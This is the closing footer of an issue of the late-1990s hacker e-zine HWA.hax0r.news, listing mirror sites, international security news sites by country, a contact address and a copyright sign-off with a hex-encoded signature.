~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW ** http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://bewoner.dma.be/cum/ Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Columbia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]